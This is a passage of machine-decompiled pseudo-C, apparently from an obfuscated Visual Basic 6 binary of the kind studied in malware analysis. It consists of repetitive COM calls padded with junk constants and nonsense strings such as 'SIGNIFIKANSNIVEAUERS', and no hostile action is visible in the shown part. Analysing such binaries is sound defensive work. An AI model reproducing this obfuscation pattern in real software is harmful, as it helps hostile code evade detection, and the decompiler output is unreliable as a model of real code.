				signed int _v636;
				intOrPtr* _v1024;
				signed int _v1036;
				intOrPtr _v1040;
				intOrPtr* _v1044;
				void* _t1016;
				signed int _t1020;
				signed int _t1024;
				signed int _t1032;
				signed int _t1036;
				signed int _t1040;
				signed int _t1044;
				signed int _t1048;
				signed int* _t1052;
				signed int _t1056;
				signed int _t1077;
				signed int _t1081;
				signed int _t1085;
				signed int _t1089;
				char* _t1093;
				signed int _t1097;
				signed int _t1101;
				signed int _t1105;
				signed int* _t1109;
				signed int _t1113;
				signed int* _t1121;
				signed int _t1129;
				signed int _t1147;
				signed int _t1151;
				signed int _t1155;
				signed int _t1159;
				signed int _t1179;
				signed int _t1183;
				signed int _t1188;
				signed int _t1192;
				char* _t1196;
				signed int _t1200;
				signed int _t1204;
				signed int _t1208;
				char* _t1212;
				signed int _t1216;
				signed int* _t1226;
				signed int _t1243;
				signed int _t1247;
				signed int _t1251;
				signed int _t1255;
				signed int* _t1259;
				signed int _t1263;
				signed int _t1280;
				signed int _t1284;
				signed int _t1288;
				signed int _t1292;
				char* _t1296;
				signed int _t1300;
				signed int _t1314;
				signed int _t1323;
				signed int _t1327;
				signed int _t1331;
				signed int _t1335;
				signed int _t1339;
				signed int* _t1343;
				signed int _t1347;
				signed int _t1364;
				signed int _t1368;
				signed int _t1372;
				signed int _t1376;
				char* _t1380;
				signed int _t1384;
				signed int _t1398;
				signed int _t1408;
				signed int _t1412;
				signed int _t1416;
				signed int _t1420;
				signed int _t1440;
				signed int _t1444;
				signed int _t1452;
				intOrPtr _t1454;
				char* _t1463;
				signed int _t1469;
				void* _t1472;
				signed int _t1477;
				void* _t1478;
				intOrPtr _t1534;
				intOrPtr _t1592;
				void* _t1609;
				signed int* _t1622;
				void* _t1628;
				void* _t1629;
				void* _t1631;
				intOrPtr _t1632;
				void* _t1634;
				void* _t1635;
				void* _t1637;
				void* _t1639;
				void* _t1640;
				void* _t1642;
				void* _t1643;
				void* _t1645;
				void* _t1646;
				void* _t1648;
				intOrPtr* _t1650;

				_t1478 = __ebx;
				_t1629 = _t1631;
				_t1632 = _t1631 - 0xc;
				 *[fs:0x0] = _t1632;
				L004011F0();
				_v16 = _t1632;
				_v12 = 0x401148;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_t1016 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t1628);
				_push(0x40b420);
				L004012F2();
				if(_t1016 != 2) {
					_v216 = 0x80020004;
					_v224 = 0xa;
					_v200 = 0x80020004;
					_v208 = 0xa;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1477 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v268 = _t1477;
					if(_v268 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x40b14c);
						_push(_a4);
						_push(_v268);
						L004012EC();
						_v364 = _t1477;
					}
				}
				if( *0x410010 != 0) {
					_v368 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v368 = 0x410010;
				}
				_t1020 =  &_v88;
				L004012E6();
				_v268 = _t1020;
				_t1024 =  *((intOrPtr*)( *_v268 + 0xf8))(_v268,  &_v80, _t1020,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x308))( *_v368));
				asm("fclex");
				_v272 = _t1024;
				if(_v272 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b424);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v372 = _t1024;
				}
				L00401322();
				_v236 = 0x43683d;
				_v320 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v320;
				_v128 = 8;
				_t54 =  &_v236; // 0x43683d
				_t1032 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v128, _t54,  &_v84);
				_v276 = _t1032;
				if(_v276 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40b17c);
					_push(_a4);
					_push(_v276);
					L004012EC();
					_v376 = _t1032;
				}
				L00401364();
				L004012DA();
				L00401352();
				if( *0x410010 != 0) {
					_v380 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v380 = 0x410010;
				}
				_t1036 =  &_v88;
				L004012E6();
				_v268 = _t1036;
				_t76 =  &_v236; // 0x43683d
				_t1040 =  *((intOrPtr*)( *_v268 + 0x60))(_v268, _t76, _t1036,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x314))( *_v380));
				asm("fclex");
				_v272 = _t1040;
				if(_v272 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b49c);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v384 = _t1040;
				}
				if( *0x410010 != 0) {
					_v388 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v388 = 0x410010;
				}
				_t1044 =  &_v92;
				L004012E6();
				_v276 = _t1044;
				_t1048 =  *((intOrPtr*)( *_v276 + 0x60))(_v276,  &_v240, _t1044,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x300))( *_v388));
				asm("fclex");
				_v280 = _t1048;
				if(_v280 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v392 = _t1048;
				}
				if( *0x410010 != 0) {
					_v396 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v396 = 0x410010;
				}
				_t1052 =  &_v96;
				L004012E6();
				_v284 = _t1052;
				_t1056 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v244, _t1052,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x314))( *_v396));
				asm("fclex");
				_v288 = _t1056;
				if(_v288 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b49c);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v400 = _t1056;
				}
				_v256 = 0x51842340;
				_v252 = 0x5afd;
				_v228 = 0x539c;
				_v136 = 0x70dd98;
				_v144 = 3;
				_v248 = _v240;
				_v200 = L"SIGNIFIKANSNIVEAUERS";
				_v208 = 8;
				L004012D4();
				_t140 =  &_v236; // 0x43683d
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x33d3c7, 0x132b94a0, 0x5b04, L"unrecumbently",  &_v128,  *_t140,  &_v248,  &_v144, _v244,  &_v228,  &_v256,  &_v264);
				_v76 = _v264;
				_v72 = _v260;
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1634 = _t1632 + 0x1c;
				if( *0x410010 != 0) {
					_v404 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v404 = 0x410010;
				}
				_t1077 =  &_v88;
				L004012E6();
				_v268 = _t1077;
				_t1081 =  *((intOrPtr*)( *_v268 + 0x178))(_v268,  &_v236, _t1077,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x308))( *_v404));
				asm("fclex");
				_v272 = _t1081;
				if(_v272 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b424);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v408 = _t1081;
				}
				if( *0x410010 != 0) {
					_v412 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v412 = 0x410010;
				}
				_t1085 =  &_v92;
				L004012E6();
				_v276 = _t1085;
				_t1089 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1085,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x314))( *_v412));
				asm("fclex");
				_v280 = _t1089;
				if(_v280 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b49c);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v416 = _t1089;
				}
				if( *0x410010 != 0) {
					_v420 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v420 = 0x410010;
				}
				_t1093 =  &_v100;
				L004012E6();
				_v284 = _t1093;
				_t1097 =  *((intOrPtr*)( *_v284 + 0xe0))(_v284,  &_v228, _t1093,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x308))( *_v420));
				asm("fclex");
				_v288 = _t1097;
				if(_v288 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40b424);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v424 = _t1097;
				}
				if( *0x410010 != 0) {
					_v428 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v428 = 0x410010;
				}
				_t1101 =  &_v104;
				L004012E6();
				_v292 = _t1101;
				_t1105 =  *((intOrPtr*)( *_v292 + 0xe8))(_v292,  &_v240, _t1101,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x320))( *_v428));
				asm("fclex");
				_v296 = _t1105;
				if(_v296 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x40b4cc);
					_push(_v292);
					_push(_v296);
					L004012EC();
					_v432 = _t1105;
				}
				if( *0x410010 != 0) {
					_v436 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v436 = 0x410010;
				}
				_t1109 =  &_v108;
				L004012E6();
				_v300 = _t1109;
				_t1113 =  *((intOrPtr*)( *_v300 + 0xf0))(_v300,  &_v112, _t1109,  *((intOrPtr*)( *((intOrPtr*)( *_v436)) + 0x314))( *_v436));
				asm("fclex");
				_v304 = _t1113;
				if(_v304 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b49c);
					_push(_v300);
					_push(_v304);
					L004012EC();
					_v440 = _t1113;
				}
				L004012C8();
				_t1635 = _t1634 + 0x10;
				_v248 = _v240;
				_v232 = _v228;
				L00401322();
				_v324 = _v96;
				_v96 = _v96 & 0x00000000;
				_v120 = _v324;
				_v128 = 9;
				_v244 = _v236;
				_t1121 =  &_v144;
				L004012C2();
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1129 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v244, 0x10,  &_v80,  &_v232,  &_v248, 0x1c0c4, _t1121, _t1121,  &_v256,  &_v144, _v112, 0, 0);
				_v308 = _t1129;
				if(_v308 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40b17c);
					_push(_a4);
					_push(_v308);
					L004012EC();
					_v444 = _t1129;
				}
				_v60 = _v256;
				_v56 = _v252;
				L00401364();
				L004012CE();
				L00401334();
				_t1637 = _t1635 + 0x28;
				_v200 = 0x623610;
				_v208 = 3;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, L"demideity", 0x10, L"snydertampenes", 2,  &_v128,  &_v144, 6,  &_v88,  &_v92,  &_v100,  &_v104,  &_v108,  &_v112);
				if( *0x410010 != 0) {
					_v448 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v448 = 0x410010;
				}
				_t1147 =  &_v88;
				L004012E6();
				_v268 = _t1147;
				_t1151 =  *((intOrPtr*)( *_v268 + 0x128))(_v268,  &_v236, _t1147,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x318))( *_v448));
				asm("fclex");
				_v272 = _t1151;
				if(_v272 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b49c);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v452 = _t1151;
				}
				if( *0x410010 != 0) {
					_v456 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v456 = 0x410010;
				}
				_t1155 =  &_v92;
				L004012E6();
				_v276 = _t1155;
				_t1159 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1155,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x310))( *_v456));
				asm("fclex");
				_v280 = _t1159;
				if(_v280 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b49c);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v460 = _t1159;
				}
				_v328 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v328;
				_v144 = 9;
				_v216 = _v236;
				_v224 = 3;
				_v200 = L"HALFPACE";
				_v208 = 8;
				L004012D4();
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v128, 0x10,  &_v144,  &_v256);
				_v36 = _v256;
				_v32 = _v252;
				_push( &_v92);
				_push( &_v88);
				_push(2);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1639 = _t1637 + 0x18;
				if( *0x410010 != 0) {
					_v464 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v464 = 0x410010;
				}
				_t1179 =  &_v88;
				L004012E6();
				_v268 = _t1179;
				_t1183 =  *((intOrPtr*)( *_v268 + 0xb0))(_v268,  &_v92, _t1179,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x320))( *_v464));
				asm("fclex");
				_v272 = _t1183;
				if(_v272 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0xb0);
					_push(0x40b4cc);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v468 = _t1183;
				}
				_push(0);
				_push(0);
				_push(_v92);
				_push( &_v128);
				L004012C8();
				_t1640 = _t1639 + 0x10;
				if( *0x410010 != 0) {
					_v472 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v472 = 0x410010;
				}
				_t1188 =  &_v96;
				L004012E6();
				_v276 = _t1188;
				_t1192 =  *((intOrPtr*)( *_v276 + 0x148))(_v276,  &_v80, _t1188,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x314))( *_v472));
				asm("fclex");
				_v280 = _t1192;
				if(_v280 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x148);
					_push(0x40b49c);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v476 = _t1192;
				}
				if( *0x410010 != 0) {
					_v480 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v480 = 0x410010;
				}
				_t1196 =  &_v100;
				L004012E6();
				_v284 = _t1196;
				_t1200 =  *((intOrPtr*)( *_v284 + 0x80))(_v284,  &_v236, _t1196,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x314))( *_v480));
				asm("fclex");
				_v288 = _t1200;
				if(_v288 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40b49c);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v484 = _t1200;
				}
				if( *0x410010 != 0) {
					_v488 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v488 = 0x410010;
				}
				_t1204 =  &_v104;
				L004012E6();
				_v292 = _t1204;
				_t1208 =  *((intOrPtr*)( *_v292 + 0x170))(_v292,  &_v108, _t1204,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v296 = _t1208;
				if(_v296 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b424);
					_push(_v292);
					_push(_v296);
					L004012EC();
					_v492 = _t1208;
				}
				if( *0x410010 != 0) {
					_v496 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v496 = 0x410010;
				}
				_t1534 =  *((intOrPtr*)( *_v496));
				_t1212 =  &_v112;
				L004012E6();
				_v300 = _t1212;
				_t1216 =  *((intOrPtr*)( *_v300 + 0x60))(_v300,  &_v240, _t1212,  *((intOrPtr*)(_t1534 + 0x2fc))( *_v496));
				asm("fclex");
				_v304 = _t1216;
				if(_v304 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v300);
					_push(_v304);
					L004012EC();
					_v500 = _t1216;
				}
				_v168 = 0x23fd7a;
				_v176 = 3;
				_v244 = 0x8789b5;
				_v332 = _v108;
				_v108 = _v108 & 0x00000000;
				_v152 = _v332;
				_v160 = 9;
				_v336 = _v80;
				_v80 = _v80 & 0x00000000;
				_v136 = _v336;
				_v144 = 8;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v516 = _v236;
				_t1226 =  &_v128;
				L004012C2();
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, _t1226, _t1226,  &_v144, 0x8e1c83f0, 0x5af9, _t1534, 0x10, _v240,  &_v244,  &_v176,  &_v192);
				L004012BC();
				_push( &_v92);
				_push( &_v112);
				_push( &_v104);
				_push( &_v100);
				_push( &_v96);
				_push( &_v88);
				_push(6);
				L004012CE();
				_push( &_v176);
				_push( &_v160);
				_push( &_v144);
				_push( &_v128);
				_push(4);
				L00401334();
				_t1642 = _t1640 + 0x30;
				if( *0x410010 != 0) {
					_v504 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v504 = 0x410010;
				}
				_t1243 =  &_v88;
				L004012E6();
				_v268 = _t1243;
				_t1247 =  *((intOrPtr*)( *_v268 + 0x60))(_v268,  &_v236, _t1243,  *((intOrPtr*)( *((intOrPtr*)( *_v504)) + 0x304))( *_v504));
				asm("fclex");
				_v272 = _t1247;
				if(_v272 >= 0) {
					_v508 = _v508 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v508 = _t1247;
				}
				if( *0x410010 != 0) {
					_v512 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v512 = 0x410010;
				}
				_t1251 =  &_v92;
				L004012E6();
				_v276 = _t1251;
				_t1255 =  *((intOrPtr*)( *_v276 + 0xf8))(_v276,  &_v80, _t1251,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x300))( *_v512));
				asm("fclex");
				_v280 = _t1255;
				if(_v280 >= 0) {
					_v516 = _v516 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b424);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v516 = _t1255;
				}
				if( *0x410010 != 0) {
					_v520 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v520 = 0x410010;
				}
				_t1259 =  &_v96;
				L004012E6();
				_v284 = _t1259;
				_t1263 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v228, _t1259,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x300))( *_v520));
				asm("fclex");
				_v288 = _t1263;
				if(_v288 >= 0) {
					_v524 = _v524 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b424);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v524 = _t1263;
				}
				_v248 =  *0x401140;
				_v120 = 0x1f4a08;
				_v128 = 3;
				_v256 = 0xb6a66b00;
				_v252 = 0x5aff;
				_v244 = _v236;
				_v240 =  *0x40113c;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v240, 0xf5a230c0, 0x5af3,  &_v244,  &_v256, L"Rearouses",  &_v128, _v80,  &_v248, _v228,  &_v264);
				_v68 = _v264;
				L00401364();
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_t1643 = _t1642 + 0x10;
				L00401352();
				if( *0x410010 != 0) {
					_v528 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v528 = 0x410010;
				}
				_t1280 =  &_v88;
				L004012E6();
				_v268 = _t1280;
				_t1284 =  *((intOrPtr*)( *_v268 + 0x50))(_v268,  &_v80, _t1280,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x314))( *_v528));
				asm("fclex");
				_v272 = _t1284;
				if(_v272 >= 0) {
					_v532 = _v532 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40b49c);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v532 = _t1284;
				}
				if( *0x410010 != 0) {
					_v536 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v536 = 0x410010;
				}
				_t1288 =  &_v92;
				L004012E6();
				_v276 = _t1288;
				_t1292 =  *((intOrPtr*)( *_v276 + 0x170))(_v276,  &_v96, _t1288,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
				asm("fclex");
				_v280 = _t1292;
				if(_v280 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b424);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v540 = _t1292;
				}
				if( *0x410010 != 0) {
					_v544 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v544 = 0x410010;
				}
				_t1296 =  &_v100;
				L004012E6();
				_v284 = _t1296;
				_t1300 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v236, _t1296,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x300))( *_v544));
				asm("fclex");
				_v288 = _t1300;
				if(_v288 >= 0) {
					_v548 = _v548 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v548 = _t1300;
				}
				_v264 = 0xb47a6a0;
				_v260 = 0x5b01;
				_v152 = _v236;
				_v160 = 3;
				_v340 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v340;
				_v144 = 9;
				_v240 = 0x2900f5;
				_v344 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v344;
				_v128 = 8;
				_v256 = 0xf61631d0;
				_v252 = 0x5aff;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1314 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x10,  &_v240, L"Dlgsmaals",  &_v144,  &_v160,  &_v264);
				_v292 = _t1314;
				if(_v292 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40b17c);
					_push(_a4);
					_push(_v292);
					L004012EC();
					_v552 = _t1314;
				}
				L004012CE();
				L00401334();
				_t1645 = _t1643 + 0x20;
				_t1323 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 3,  &_v128,  &_v144,  &_v160, 3,  &_v88,  &_v92,  &_v100);
				asm("fclex");
				_v268 = _t1323;
				if(_v268 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40b14c);
					_push(_a4);
					_push(_v268);
					L004012EC();
					_v556 = _t1323;
				}
				L148:
				L148:
				if( *0x410010 != 0) {
					_v560 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v560 = 0x410010;
				}
				_t1327 =  &_v88;
				L004012E6();
				_v268 = _t1327;
				_t1331 =  *((intOrPtr*)( *_v268 + 0x60))(_v268,  &_v236, _t1327,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x304))( *_v560));
				asm("fclex");
				_v272 = _t1331;
				if(_v272 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v564 = _t1331;
				}
				if( *0x410010 != 0) {
					_v568 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v568 = 0x410010;
				}
				_t1335 =  &_v92;
				L004012E6();
				_v276 = _t1335;
				_t1339 =  *((intOrPtr*)( *_v276 + 0xf8))(_v276,  &_v80, _t1335,  *((intOrPtr*)( *((intOrPtr*)( *_v568)) + 0x300))( *_v568));
				asm("fclex");
				_v280 = _t1339;
				if(_v280 >= 0) {
					_v572 = _v572 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b424);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v572 = _t1339;
				}
				if( *0x410010 != 0) {
					_v576 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v576 = 0x410010;
				}
				_t1343 =  &_v96;
				L004012E6();
				_v284 = _t1343;
				_t1347 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v228, _t1343,  *((intOrPtr*)( *((intOrPtr*)( *_v576)) + 0x300))( *_v576));
				asm("fclex");
				_v288 = _t1347;
				if(_v288 >= 0) {
					_v580 = _v580 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b424);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v580 = _t1347;
				}
				_v248 =  *0x401140;
				_v120 = 0x1f4a08;
				_v128 = 3;
				_v256 = 0xb6a66b00;
				_v252 = 0x5aff;
				_v244 = _v236;
				_v240 =  *0x40113c;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v240, 0xf5a230c0, 0x5af3,  &_v244,  &_v256, L"Rearouses",  &_v128, _v80,  &_v248, _v228,  &_v264);
				_v68 = _v264;
				L00401364();
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_t1646 = _t1645 + 0x10;
				L00401352();
				if( *0x410010 != 0) {
					_v584 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v584 = 0x410010;
				}
				_t1364 =  &_v88;
				L004012E6();
				_v268 = _t1364;
				_t1368 =  *((intOrPtr*)( *_v268 + 0x50))(_v268,  &_v80, _t1364,  *((intOrPtr*)( *((intOrPtr*)( *_v584)) + 0x314))( *_v584));
				asm("fclex");
				_v272 = _t1368;
				if(_v272 >= 0) {
					_v588 = _v588 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40b49c);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v588 = _t1368;
				}
				if( *0x410010 != 0) {
					_v592 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v592 = 0x410010;
				}
				_t1372 =  &_v92;
				L004012E6();
				_v276 = _t1372;
				_t1376 =  *((intOrPtr*)( *_v276 + 0x170))(_v276,  &_v96, _t1372,  *((intOrPtr*)( *((intOrPtr*)( *_v592)) + 0x308))( *_v592));
				asm("fclex");
				_v280 = _t1376;
				if(_v280 >= 0) {
					_v596 = _v596 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b424);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v596 = _t1376;
				}
				if( *0x410010 != 0) {
					_v600 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v600 = 0x410010;
				}
				_t1380 =  &_v100;
				L004012E6();
				_v284 = _t1380;
				_t1384 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v236, _t1380,  *((intOrPtr*)( *((intOrPtr*)( *_v600)) + 0x300))( *_v600));
				asm("fclex");
				_v288 = _t1384;
				if(_v288 >= 0) {
					_v604 = _v604 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b424);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v604 = _t1384;
				}
				_v264 = 0xb47a6a0;
				_v260 = 0x5b01;
				_v152 = _v236;
				_v160 = 3;
				_v348 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v348;
				_v144 = 9;
				_v240 = 0x2900f5;
				_v352 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v352;
				_v128 = 8;
				_v256 = 0xf61631d0;
				_v252 = 0x5aff;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1398 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x10,  &_v240, L"Dlgsmaals",  &_v144,  &_v160,  &_v264);
				_v292 = _t1398;
				if(_v292 >= 0) {
					_v608 = _v608 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40b17c);
					_push(_a4);
					_push(_v292);
					L004012EC();
					_v608 = _t1398;
				}
				_push( &_v100);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_push( &_v160);
				_push( &_v144);
				_push( &_v128);
				_push(3);
				L00401334();
				_t1648 = _t1646 + 0x20;
				if( *0x410010 != 0) {
					_v612 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v612 = 0x410010;
				}
				_t1408 =  &_v88;
				L004012E6();
				_v268 = _t1408;
				_t1412 =  *((intOrPtr*)( *_v268 + 0x128))(_v268,  &_v236, _t1408,  *((intOrPtr*)( *((intOrPtr*)( *_v612)) + 0x318))( *_v612));
				asm("fclex");
				_v272 = _t1412;
				if(_v272 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b49c);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v616 = _t1412;
				}
				if( *0x410010 != 0) {
					_v620 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v620 = 0x410010;
				}
				_t1416 =  &_v92;
				L004012E6();
				_v276 = _t1416;
